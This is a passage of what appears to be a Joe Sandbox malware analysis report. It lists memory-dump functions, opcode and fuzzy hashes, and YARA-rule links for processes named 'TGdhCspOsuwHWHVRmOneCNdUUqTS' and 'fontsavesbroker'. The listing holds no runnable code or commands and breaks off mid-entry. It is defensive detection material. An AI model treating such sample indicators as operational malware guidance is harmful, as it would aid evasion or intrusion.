                • Snapshot File: hcaresult_17_2_7ffd9b78a000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2e67d1b2e3c90789e0931aa983c0a54a843d59d60488cb80a406a542b1e16b5f
                • Instruction ID: f3c254c46f6a4440577475f80c250d5072d6ff54cb057bbb94e2ffd5f06dd632
                • Opcode Fuzzy Hash: 2e67d1b2e3c90789e0931aa983c0a54a843d59d60488cb80a406a542b1e16b5f
                • Instruction Fuzzy Hash: 3CF08230E15A4E8EEF94EFA898592FE72E0FF18306F50097AE82DC21A4DF3056508740
                Function 00007FFD9B78275D Relevance: .0, Instructions: 30COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 64a78fa5c064780ae0fecf5e99d7dc425e0b4a886db5e78addbc138b8016fae2
                • Instruction ID: 1cd5384a4e2fd9df8fddc883b86eab12bc3f7a631485c8a48993bd4cee6a1e91
                • Opcode Fuzzy Hash: 64a78fa5c064780ae0fecf5e99d7dc425e0b4a886db5e78addbc138b8016fae2
                • Instruction Fuzzy Hash: 02F0B430A0A78A8FDB599FB484652A93B60FF16202F4545BED80DCA1F2DB38A504C701
                Function 00007FFD9B781710 Relevance: .0, Instructions: 25COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b780000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction ID: 5184d381838e8a8089b4dd5c86d830d8dfcfa7094479b94906cdc0600710bd16
                • Opcode Fuzzy Hash: 0fe8a46c296d93708f61b05d60e40878e9e488cc7cac960711ac09eb02f71a12
                • Instruction Fuzzy Hash: 8BE0E520F0BE0A46E774925984D557471D19F48315FBA8775F01DC65F1EB3CDE82C201
                Function 00007FFD9B796C6F Relevance: .0, Instructions: 23COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7326bf728ebd63ae1e224e7c9d381072028501f251c9c64eea9b39786eed9c07
                • Instruction ID: 193fa3cc07d7944dc47db44d9319667fd2580191806c1e5be80a1bc8b54a6adc
                • Opcode Fuzzy Hash: 7326bf728ebd63ae1e224e7c9d381072028501f251c9c64eea9b39786eed9c07
                • Instruction Fuzzy Hash: 1BE08C30A46A0C5FCBB0AA69984479572A4FB4A309F4002AAD44CC2090EA356AE9CB01
                Function 00007FFD9B78BE53 Relevance: .0, Instructions: 20COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b78a000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction ID: 92e7dd44096eb567c5780a72d3b0cc3094c2e3b84c6ea81aaf4c43f33e5d6a52
                • Opcode Fuzzy Hash: b192cd5b06488316db087836aa4ddda2474db24bc0158c281008add675c9bdd3
                • Instruction Fuzzy Hash: 24E052B0E0960E9FDB28DF94D4E55FDB7B1BF14301F610539E419A32B1CA3869508B40
                Function 00007FFD9B78BF1F Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b78a000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction ID: ef946c5ff71a100aa638b4bec67e8d4e1f3a178f76cd03da9d02765a4a7e5887
                • Opcode Fuzzy Hash: 28bdbf73e458c66e6c73acbfe0d9b65e8ec568619fc3506dfaa08a2ca4efe61c
                • Instruction Fuzzy Hash: BDD0E231A0894D8ECF50EFC8D4809ECBBB0EF58301F000022D10CD2260CA30A4508B40
                Function 00007FFD9B79544B Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b90fffcb09563f4f0b5f7e037a9ee6288df15a26ccdab332fedd128c2e7d922d
                • Instruction ID: 5ce50a90bae6d7b9eeeb1fc0c143650b41013c8256c897b5f39ac79b60196719
                • Opcode Fuzzy Hash: b90fffcb09563f4f0b5f7e037a9ee6288df15a26ccdab332fedd128c2e7d922d
                • Instruction Fuzzy Hash: 26D0C9B1E06B1A9FDBA0DE68849A2A8BBE1FF58301F40422AE458D3271DF3024119B00
                Function 00007FFD9B791A23 Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9484e95fc884c76911b22816c20f7854c21aa9c870fc6746099f9cbc7ba779f
                • Instruction ID: 740a38ca63460fcc554418e57079b073201635774318a4eddf4d03c6b2f47beb
                • Opcode Fuzzy Hash: f9484e95fc884c76911b22816c20f7854c21aa9c870fc6746099f9cbc7ba779f
                • Instruction Fuzzy Hash: 78D0C774E0D25D4FD7149F50C8E86ED76A1AF50304F4001B9D05D5B1E6C6741614D715

                Non-executed Functions

                Function 00007FFD9B7919A0 Relevance: 6.3, Strings: 5, Instructions: 46COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b791000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: !$"$'$/$/
                • API String ID: 0-4281964328
                • Opcode ID: 70bc19ddf0bca49faf0e5943c26e0ce65b9f7175b0b3c8b54fd77155210774d4
                • Instruction ID: f3758aa422700af54377412d352125fdbaf6348ceb1f9d3c467c6299b9c7a943
                • Opcode Fuzzy Hash: 70bc19ddf0bca49faf0e5943c26e0ce65b9f7175b0b3c8b54fd77155210774d4
                • Instruction Fuzzy Hash: 8F11D470E0932D8BEB64DF94D8983EDB6F1AB08311F01027AD00DEB6A1DB785A94CF04
                Function 00007FFD9B78F587 Relevance: 5.0, Strings: 4, Instructions: 26COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.1892953326.00007FFD9B78F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_7ffd9b78f000_TGdhCspOsuwHWHVRmOneCNdUUqTS.jbxd
                Similarity
                • API ID:
                • String ID: )$F$k${
                • API String ID: 0-3509197890
                • Opcode ID: 139acd0dc6cf42a994235ac47baff8e04bf572d70db98f483ffd16f6715f025f
                • Instruction ID: f5639c953b4cc0367892cb852d188d71bd78c14ce5a97e7e0b4710fc0af10702
                • Opcode Fuzzy Hash: 139acd0dc6cf42a994235ac47baff8e04bf572d70db98f483ffd16f6715f025f
                • Instruction Fuzzy Hash: 2CF0FF34E0975E8AEB34EA50D8A47ED77A2BB44342F114AB9C00D9A1A4CB785B81DF41

                Executed Functions

                Function 00007FFD9B77E692 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: ;$Z$}
                • API String ID: 0-2180252066
                • Opcode ID: d51357dea481044d2289a2b66d5bd1af9545d954710bb1f4fde5625fce196cc5
                • Instruction ID: e986b4e77b8e8759289d03779cdac5cd7479acc6fe0970122d92f79854d5175a
                • Opcode Fuzzy Hash: d51357dea481044d2289a2b66d5bd1af9545d954710bb1f4fde5625fce196cc5
                • Instruction Fuzzy Hash: E451AF70E0966D8FDBA9DB54C8A0BE9B7B5EF54311F1046EAD00DA72A1CB746A80CF40
                Function 00007FFD9B771C7D Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: L$U
                • API String ID: 0-1814620523
                • Opcode ID: 0ac21a37293af77a3e78601022111823351531077d4686f1358e3ecc3598af13
                • Instruction ID: 8db67bc269346738dd3e1178cdfeb01d6e01094613636d9995e2376c4840d8d9
                • Opcode Fuzzy Hash: 0ac21a37293af77a3e78601022111823351531077d4686f1358e3ecc3598af13
                • Instruction Fuzzy Hash: B051F530B08B494FDB5CCE5888A46B977E2FF98301B15467ED45EC72A1CE74E802C780
                Function 00007FFD9B780270 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: Q$R
                • API String ID: 0-3870444779
                • Opcode ID: e77586657d21184e1feffe6ed4a71281333e1f89e05f4f4af3c952562d6868ba
                • Instruction ID: 171edc668198ae3eeec02f54caf081813d7ce9b523bc57a50c76473b91136b60
                • Opcode Fuzzy Hash: e77586657d21184e1feffe6ed4a71281333e1f89e05f4f4af3c952562d6868ba
                • Instruction Fuzzy Hash: E431CA70E09B6D8FEBA8DF44C8A47ADB7B1EF54312F1041AAD00DA72A1CB745A81DF40
                Function 00007FFD9B770525 Relevance: 1.6, Strings: 1, Instructions: 389COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 1c6d27e5940ddfb4cbb65fcf7c76bee40566468817c772be74286b5de03e52d8
                • Instruction ID: 692f4bddb2a08f2f82095e91846b0cc05b4dc88696d4ecd8ab7e4f75522f3f99
                • Opcode Fuzzy Hash: 1c6d27e5940ddfb4cbb65fcf7c76bee40566468817c772be74286b5de03e52d8
                • Instruction Fuzzy Hash: 75B13347B0F6D20FEB2166BC68B55F97B90EF916A570902F7E098CA0F7EC48650683C1
                Function 00007FFD9B7705A0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 7144ed5cc100c067ffaa6bc281b33717823f14e9c6336de59a729cd4e19203dc
                • Instruction ID: c9a1af434a48cefc50c8b4c0297192f2f51529ad4081108683830f4a3af7f2b8
                • Opcode Fuzzy Hash: 7144ed5cc100c067ffaa6bc281b33717823f14e9c6336de59a729cd4e19203dc
                • Instruction Fuzzy Hash: BA913543B0F7D60FEB2166B868B51F97B91EF516A4B0902F7E098CA0F7AC58650683C1
                Function 00007FFD9B77060D Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: b8e6334230615240bd912cd37cecbbd8b90c8d7c438d9ce5823b5f3f2ae764c0
                • Instruction ID: 80b5547297df689c8462b08d9fc248a260115a8e7c24d2587cd138a9f260cdde
                • Opcode Fuzzy Hash: b8e6334230615240bd912cd37cecbbd8b90c8d7c438d9ce5823b5f3f2ae764c0
                • Instruction Fuzzy Hash: A5812443B0F7D60FEB2166BC68751F97B91EF516A4B0902F7E099CA0F7EC58660682C1
                Function 00007FFD9B770638 Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: f951bda2384a92cc72488b59cb987f5a85414a9f1a58136a64aa7c4a0f0e6a5e
                • Instruction ID: 4cb7c4bee056a25aabcf36a00afb2a793f56e25d3ff2c65f4dbbaac5c4e92c3d
                • Opcode Fuzzy Hash: f951bda2384a92cc72488b59cb987f5a85414a9f1a58136a64aa7c4a0f0e6a5e
                • Instruction Fuzzy Hash: C7813653B0F7C60FEB2166BC68651E97B91EF516A4B0902F7E098CB0F7EC14A50683C1
                Function 00007FFD9B7716A8 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 171a1e92eb8068f0ceb68e79539963a8d9d6d4c17c0e085df19b12bf43cb3d5d
                • Instruction ID: cc797dc6b3e8f4cd45dd0a879aa648fe2b0328052c367afab4b1f4fdeb97efd1
                • Opcode Fuzzy Hash: 171a1e92eb8068f0ceb68e79539963a8d9d6d4c17c0e085df19b12bf43cb3d5d
                • Instruction Fuzzy Hash: 1581C031B0DB494FDB58DE5C88A55B977E2FF98301B15027EE49EC32A2DE74AD028781
                Function 00007FFD9B770640 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: bd32541157e9beca6878a92f13517f1481766e2ad8775c42b80952af7efe33b2
                • Instruction ID: d2096046a7c08d5db7c49dedda3f32cf67b2ed59126516fcaef3ae06ce1e454b
                • Opcode Fuzzy Hash: bd32541157e9beca6878a92f13517f1481766e2ad8775c42b80952af7efe33b2
                • Instruction Fuzzy Hash: 87710683B0F7C60FEB2166F868751F97B91EF516A4B0942F7E0998A0F7EC54660683C1
                Function 00007FFD9B77C8DD Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: _
                • API String ID: 0-701932520
                • Opcode ID: f29e298d6e8d747b6b22731c859663c857e82d090e6148eeaee1587e39281a29
                • Instruction ID: fc1cecfdff01208ebe18a54a3a521decc23a3eb3fe639cffb7b7953ad24f1e64
                • Opcode Fuzzy Hash: f29e298d6e8d747b6b22731c859663c857e82d090e6148eeaee1587e39281a29
                • Instruction Fuzzy Hash: 9E51292B74D62A4AE7147BBCB8A54FD7350EF94376F0507B7E10D8A0E7DE2831468A90
                Function 00007FFD9B773155 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 4462d00c71aacefec390a5fe711a648f73df2dd16c0d1c5768eecf8843629843
                • Instruction ID: 7ca4797f1aa0dea5d3628cdb93c342109ba4fb62ed337ea7c297370e8f5cee61
                • Opcode Fuzzy Hash: 4462d00c71aacefec390a5fe711a648f73df2dd16c0d1c5768eecf8843629843
                • Instruction Fuzzy Hash: 81511A70E1961D8FEB64DBA8C4A46EDB7F1FF48300F524279D009E72A2DB786A45CB10
                Function 00007FFD9B772095 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 777ff7e46afe044f386c3f051890c1ec8b48499674c39a7a41d37c404fa08d6e
                • Instruction ID: 79dea0b7f1b6b10dab7301a261e9cdfae5ed423024cd7690c2bb5c14553c6c98
                • Opcode Fuzzy Hash: 777ff7e46afe044f386c3f051890c1ec8b48499674c39a7a41d37c404fa08d6e
                • Instruction Fuzzy Hash: 3B414631B1E64A0FE765DBB884A56B97BE0EF46310F4642FBD05CC31B6DE68A9028341
                Function 00007FFD9B77EEFC Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: h
                • API String ID: 0-2439710439
                • Opcode ID: 8eaec4aa670d9ad90b1830d8f2842ca07508820f61a9a27c19a5cf03b8ce6b14
                • Instruction ID: eb2e119606995f5e67193a0f29cbd90413294a572396984c665931fb823541f7
                • Opcode Fuzzy Hash: 8eaec4aa670d9ad90b1830d8f2842ca07508820f61a9a27c19a5cf03b8ce6b14
                • Instruction Fuzzy Hash: 73413A70E19A5D8FDBA8DF188C957A9B7A1FF59301F1002E9D40DE72A2DE746E818F01
                Function 00007FFD9B770805 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 0a5fd4460a643f388de74e5b980e37a3315cc6283df38752021e8ee89c13d8b3
                • Instruction ID: 14146d42ef88f1ef070108bd823f128c579c1c84032e481cc1bc00f61a6f30ea
                • Opcode Fuzzy Hash: 0a5fd4460a643f388de74e5b980e37a3315cc6283df38752021e8ee89c13d8b3
                • Instruction Fuzzy Hash: 87218B52B0E6875BEB1073B898792E93BD0EF11329F0945B7D059CE0E3ED14A15AC291
                Function 00007FFD9B773378 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 5f3bb389b32786c58583f58fd0cbaa80d347c2cff89ad64305365c41f0307522
                • Instruction ID: c74e7aa68d7199e1c0f02238133f18ab13e49977ccb835411a1e16c9ca5ca3ab
                • Opcode Fuzzy Hash: 5f3bb389b32786c58583f58fd0cbaa80d347c2cff89ad64305365c41f0307522
                • Instruction Fuzzy Hash: EE219F3098D78A9FD742EBB088685A57BF0EF06310F1645F7D448CB0A2DA289646C720
                Function 00007FFD9B770A01 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 705f3c956f3b7b23fc10c2510377e8fef279b3e078a9d0d16fb7e158fc5f2503
                • Instruction ID: eaf785570a35a37354cb9a17ee8e3694b873d74b854b9078a5c0746f0c59494c
                • Opcode Fuzzy Hash: 705f3c956f3b7b23fc10c2510377e8fef279b3e078a9d0d16fb7e158fc5f2503
                • Instruction Fuzzy Hash: CD119431E19A0E4FEB90EBA8C8996BD77E0FF18700F4246B6D41CC71B6EE74A5448740
                Function 00007FFD9B77121D Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 66354ddd79c5c61a8627a3f46c281523197c1f9a80770dcb0c67a846caa6e825
                • Instruction ID: 0273d7c745f2effa37004361624abea2d3a51dda9069e55c7256d20d0786bd43
                • Opcode Fuzzy Hash: 66354ddd79c5c61a8627a3f46c281523197c1f9a80770dcb0c67a846caa6e825
                • Instruction Fuzzy Hash: 0F11B230B1A64E8EEB59EBA484B86B97BE0FF55305F4106BED41AC74F2DE7466048700
                Function 00007FFD9B77AFB8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 6e8e85163360403844213a2dfbf99696d10a78cbbaea5f225b6bf26d7c54284c
                • Instruction ID: 3188b35075921c3b4b9bbe9a9de8736a1399b4d0fd8e2ccd689716f6deb5307a
                • Opcode Fuzzy Hash: 6e8e85163360403844213a2dfbf99696d10a78cbbaea5f225b6bf26d7c54284c
                • Instruction Fuzzy Hash: 7911C631E19A0E4EFB50EBA488A85FD77E1FF58300F4149B6D419C31B5EE34A5448740
                Function 00007FFD9B77BD35 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 062ad327ec6dc9391f9eb9b44316c6ec07e85ccd228fa31a75b0af23d4a9cde7
                • Instruction ID: 5c047e9bf3ce80daeefb950376a581e8630e2265c5e5da6536a2f3d55a06a6af
                • Opcode Fuzzy Hash: 062ad327ec6dc9391f9eb9b44316c6ec07e85ccd228fa31a75b0af23d4a9cde7
                • Instruction Fuzzy Hash: 97115E31A19A4E8FDB54EB64C8A96BD7BE0FF18305F5109BED419C71A1DA75A640C700
                Function 00007FFD9B772E65 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 16a81a6dbfd8928c33d26c75dc63d34eb635074dcbb1cf9b1be5357e80a0b109
                • Instruction ID: d15a879d4adfca73462055ff62e45ca999029099fb4ac7b49826a93354447855
                • Opcode Fuzzy Hash: 16a81a6dbfd8928c33d26c75dc63d34eb635074dcbb1cf9b1be5357e80a0b109
                • Instruction Fuzzy Hash: 63018430E1A64E4FE751EBA4849CAB977E0EF1A301F4255B6D418C71B6EA74E5448700
                Function 00007FFD9B77A9D9 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 50b7807a47507b7e75e66637193bfb35f6e661a87638a5d3c97c4e4d223f885a
                • Instruction ID: e6e30c776f5e900b6f2d424dcd4f2ffe799752eef21de0632bafec044f2335b9
                • Opcode Fuzzy Hash: 50b7807a47507b7e75e66637193bfb35f6e661a87638a5d3c97c4e4d223f885a
                • Instruction Fuzzy Hash: 1E016D30A1E74E4FEB59AB64C8686B97BB0EF15305F4205BED419C70F2EA69A544C700
                Function 00007FFD9B780E81 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.1935187726.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_7ffd9b770000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: U
                • API String ID: 0-3372436214
                • Opcode ID: 36c62858cacb1674e329d5fb3c14b3a55faca705a3d1323c16897102f01afdda
                • Instruction ID: b20db65a17468be169e22828db3a776f5aa01af3f127d113c1eeaa002c002f9a
                • Opcode Fuzzy Hash: 36c62858cacb1674e329d5fb3c14b3a55faca705a3d1323c16897102f01afdda
                • Instruction Fuzzy Hash: 26F0AF30A1AB4E8FEB94EF6488682FE7BA0FF15312F41057AD81CC21B5DB345650CB40
                Function 00007FFD9B772ED9 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
